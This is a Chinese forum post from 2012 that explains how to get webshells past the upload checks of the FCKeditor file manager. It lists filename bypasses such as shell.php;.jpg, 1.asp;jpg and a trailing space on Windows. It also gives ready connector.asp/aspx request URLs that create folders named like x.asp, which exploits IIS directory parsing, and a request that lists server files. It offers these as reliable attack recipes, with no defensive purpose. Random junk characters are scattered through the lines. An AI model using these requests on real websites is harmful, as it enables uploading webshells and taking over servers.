很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg5 b2 R7 V" s% R
, t( y1 Q$ O( i7 F1 {提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
; G5 w0 \! e' N" y0 L3 V
; T# ^8 v3 V. ~继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
; p8 j6 j! R8 d, e/ T3 H' W( C! Q9 z) p& [" I# @
突破建立文件夹:: x8 Y& C6 X0 x8 E; |+ P2 y" P
. n* L& n! d. \$ x6 y* j9 h- m- y A
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp$ i& Y2 z( l' I; X
2 Q( D0 Y- {2 {5 O9 ?参数:5 n [' ^$ |5 q$ y- M/ _& ~
, _; T- A) K w7 l5 P- I. D" A当前目录名:CurrentFolder=/qing.asp
8 q) ]! V% p; [8 w- m& H) c
3 V8 C+ w P' m$ n; Y+ r新的目录名:NewFolderName=x.asp
6 }+ C- }+ Y5 ~ q* m0 _6 Z
' Q0 r2 D& _6 a/ R$ F其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……& Q w+ d7 z9 h3 ]
4 N# y7 w5 F" G* c; G" {那么 x.asp 就已经建立生成了,此方法百试百灵!
" E) _( h8 c4 {7 u! R/ W
0 i7 P. X t, y1 c& _ k- T. U新建文件夹参数 x.asp,基本都能搞定。
+ Z, [; v; t6 N: J5 w, f+ s6 B$ m' I* d5 C8 W
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
% e- i1 O1 Y. i4 `; h) P7 M! u
: c; j2 `0 y# {" G( F- |aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp5 h9 |' u3 F4 e; l! E7 D9 V
5 t% j$ p6 j; u/ q% y' \9 q+ K; P% o
获取文件列表/ E; R; i6 s9 O2 w
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F3 e6 e) m' m( n* `* b& a
/ i6 o% s" M$ g# R1 J2 C |
发表于 2012-12-31 09:27:09
收藏
支持
反对